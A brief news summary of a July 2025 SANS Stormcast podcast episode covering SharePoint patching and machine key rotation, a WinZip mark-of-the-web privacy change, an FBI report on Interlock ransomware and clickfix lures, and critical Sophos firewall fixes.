Crucial Cybersecurity Topics Discussed in Latest Stormcast Podcast

In the July 23, 2025 edition of the Sans Internet Storm Centers Stormcast podcast, Johannes Ullrich, recording from Jacksonville, Florida, addresses several critical cybersecurity topics.

The first point discussed concerns the vulnerability of SharePoint, which continues to be exploited. Microsoft recently released an update for SharePoint 2016, in addition to updates already available for the 2019 versions and the subscription edition. Johannes emphasizes the importance of downloading and applying two separate files for these updates: the security patch for SharePoint and the language pack. It is crucial to restart the system after installing the security patch before applying the language pack, as applying both files simultaneously leads to failures.

An often overlooked aspect of this vulnerability is the theft of system machine keys. Early exploitations of this flaw aimed to steal these keys, allowing attackers to spoof the viewing state and compromise the system again. Johannes stresses that simply updating the patch and removing backdoors or webshells is not enough. It is imperative to update the machine keys to avoid re-compromise.

Johannes also addresses a privacy issue related to the use of Winzip 710 or later versions. Traditionally, the "mark of the web" on Windows includes a zone identifier indicating that the file was downloaded from the Internet, as well as the download URL. However, Winzip has changed this default behavior to include only the zone identifier, without the URL, to protect user privacy. This feature can be disabled to revert to the previous behavior.

The podcast also mentions a detailed report from the FBI and other government agencies on Interlock ransomware. This report provides practical information on detecting and preventing this type of ransomware, which often spreads in the form of fake browser updates. Attackers also use the "clickfix" technique, where users are prompted to copy-paste PowerShell code, under the pretext of bypassing a capture to access the next page.

Finally, Johannes discusses updates from Sophos for its firewalls, fixing five vulnerabilities, two of which are classified as critical. The first is an arbitrary file write vulnerability that can lead to code execution without authentication, and the second is an SQL injection vulnerability in the transparent SMTP proxy, a legacy feature. These vulnerabilities affect specific configurations, but it is recommended to update systems to avoid any risk.

In conclusion, this edition of the podcast provides valuable information and practical advice for cybersecurity professionals, emphasizing the importance of updates and good security practices.

https://www.youtube.com/watch?v=7P0-7eof_Pw TAGS: Cybersecurity,Vulnerabilities,Ransomware,Privacy